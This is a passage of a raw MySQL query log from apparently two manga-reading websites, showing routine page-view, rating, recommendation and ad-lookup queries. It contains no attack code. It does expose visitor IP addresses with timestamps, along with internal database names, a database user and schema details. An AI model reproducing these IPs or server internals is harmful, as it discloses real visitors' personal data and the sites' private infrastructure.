'%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330642675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642675 Quit 330642676 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16297' 330642676 Quit 330642677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642677 Query select * FROM chapters where id = '16297' 330642677 Quit 330642678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642678 Query select * FROM chapters where manga_id = '330' order by id desc 330642678 Quit 330642679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642679 Query Update chapters set view=view+1 where id = '16297' 330642679 Quit 330642680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642680 Query select * FROM chapters where id = '16297' 330642680 Quit 330642681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642681 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16297' 330642681 Quit 330642682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642682 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('330', '16297', '116.179.32.154', 'mangacherri.com', '2026-02-26 03:28:13', '2026-02-26 03:28:13') 330642682 Quit 330642683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642683 Query select * FROM chapter_images where chapter_id = '16297' 330642683 Quit 330642684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642684 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '330' and m.active = 1 330642684 Quit 330642685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642685 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='330' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330642686 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642686 Quit 330642687 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 260225 19:28:14 330642687 Quit 330642688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642688 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330642688 Quit 330642689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642689 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330642689 Quit 330642690 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642690 Quit 330642691 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642691 Quit 330642674 Quit 330642692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642692 Quit 330642693 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642693 Quit 330642694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642694 Quit 330642695 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642695 Quit 330642696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642697 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642696 Quit 330642697 Quit 330642698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642698 Quit 330642699 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642699 Quit 330642685 Quit 330642700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642700 Quit 330642701 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642701 Quit 330642702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642702 Quit 330642703 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642703 Quit 330642704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642704 Quit 330642705 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642705 Quit 330642706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642706 Quit 330642707 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642707 Quit 330642708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642708 Quit 330642709 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18267' 330642710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642709 Quit 330642710 Query select * FROM chapters where id = '18267' 330642710 Quit 330642711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642711 Query select * FROM chapters where manga_id = '33' order by id desc 330642711 Quit 330642712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642712 Query Update chapters set view=view+1 where id = '18267' 330642712 Quit 330642713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642713 Query select * FROM chapters where id = '18267' 330642713 Quit 330642714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642714 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18267' 330642714 Quit 330642715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642715 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('33', '18267', '37.31.56.104', 'mangacherri.com', '2026-02-26 03:28:14', '2026-02-26 03:28:14') 330642715 Quit 330642716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642716 Query select * FROM chapter_images where chapter_id = '18267' 330642716 Quit 330642717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642717 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '33' and m.active = 1 330642717 Quit 330642718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642718 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='33' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330642719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642719 Quit 330642720 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16919' 330642720 Quit 330642721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642721 Query select * FROM chapters where id = '16919' 330642721 Quit 330642722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642722 Query select * FROM chapters where manga_id = '340' order by id desc 330642722 Quit 330642723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642723 Query Update chapters set view=view+1 where id = '16919' 330642723 Quit 330642724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642724 Query select * FROM chapters where id = '16919' 330642724 Quit 330642725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642725 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16919' 330642725 Quit 330642726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642726 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('340', '16919', '2a03:2880:f804:32::', 'mangacherri.com', '2026-02-26 03:28:14', '2026-02-26 03:28:14') 330642726 Quit 330642727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642727 Query select * FROM chapter_images where chapter_id = '16919' 330642727 Quit 330642728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642728 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '340' and m.active = 1 330642728 Quit 330642729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642729 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='340' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Office%' OR genres like '%Romance%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330642730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642730 Quit 330642731 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'my-life-as-inukai-sans-dog' 330642731 Quit 330642732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642732 Query select * FROM chapters where manga_id = '239' order by id desc 330642732 Quit 330642733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642733 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330642718 Quit 330642734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642734 Quit 330642735 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642735 Quit 330642733 Quit 330642736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642736 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330642737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642737 Quit 330642738 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642738 Quit 330642739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642739 Quit 330642740 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642740 Quit 330642741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642741 Quit 330642742 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642742 Quit 260225 19:28:15 330642743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642743 Quit 330642744 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16279' 330642744 Quit 330642745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642745 Query select * FROM chapters where id = '16279' 330642745 Quit 330642746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642746 Query select * FROM chapters where manga_id = '327' order by id desc 330642746 Quit 330642747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642747 Query Update chapters set view=view+1 where id = '16279' 330642747 Quit 330642748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642748 Query select * FROM chapters where id = '16279' 330642749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642748 Quit 330642749 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16279' 330642749 Quit 330642750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642750 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('327', '16279', '97.105.132.3', 'mangacherri.com', '2026-02-26 03:28:15', '2026-02-26 03:28:15') 330642750 Quit 330642751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642751 Query select * FROM chapter_images where chapter_id = '16279' 330642751 Quit 330642752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642752 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '327' and m.active = 1 330642752 Quit 330642753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642753 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='327' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Office%' OR genres like '%Romance%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330642729 Quit 330642754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642754 Quit 330642755 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642755 Quit 330642756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642756 Quit 330642757 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642757 Quit 330642758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642758 Quit 330642759 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642759 Quit 330642760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642761 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642760 Quit 330642761 Quit 330642736 Quit 330642762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642762 Query select * FROM comments where manga_id = '239' and parent_id is null order by created desc 330642762 Quit 330642763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642763 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330642763 Quit 330642764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642764 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Animals%' OR m.genres like '%Comedy%' OR m.genres like '%Romance%' OR m.genres like '%Shounen%' OR m.genres like '%Supernatural%') group by manga_id ORDER BY sum(view) DESC 330642764 Quit 330642765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642765 Quit 330642766 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642766 Quit 330642767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330642767 Quit 330642768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642768 Query select * FROM chapters where manga_id = '239' order by created desc limit 1 330642768 Quit 330642769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642769 Query select * FROM comments where parent_id = '776' 330642769 Quit 330642770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330642770 Quit 330642771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330642771 Quit 330642772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330642772 Quit 330642773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330642773 Quit 330642774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330642774 Quit 330642775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330642775 Quit 330642776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330642776 Quit 330642777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330642777 Quit 330642778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330642778 Quit 330642779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330642779 Quit 330642780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330642780 Quit 330642781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330642781 Quit 330642782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330642782 Quit 330642783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330642783 Quit 330642784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330642784 Quit 330642785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330642785 Quit 330642786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330642786 Quit 330642787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330642787 Quit 330642788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330642788 Quit 330642789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330642789 Quit 330642790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330642790 Quit 330642791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330642791 Quit 330642792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330642792 Quit 330642793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330642793 Quit 330642794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330642794 Quit 330642795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330642795 Quit 330642796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330642796 Quit 330642797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330642797 Quit 330642798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330642798 Quit 330642799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330642799 Quit 330642800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330642800 Quit 330642801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330642801 Quit 330642802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330642802 Quit 330642803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330642803 Quit 330642804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330642804 Quit 330642805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330642805 Quit 330642806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330642806 Quit 330642807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330642807 Quit 330642808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330642808 Quit 330642809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330642809 Quit 330642810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330642810 Quit 330642811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330642811 Quit 330642812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330642812 Quit 330642813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330642813 Quit 330642814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330642814 Quit 330642815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330642815 Quit 330642816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330642816 Quit 330642817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330642817 Quit 330642818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330642818 Quit 330642819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330642819 Quit 330642820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330642820 Quit 330642821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330642821 Quit 330642822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330642822 Quit 330642823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330642823 Quit 330642824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330642824 Quit 330642825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330642825 Quit 330642826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings 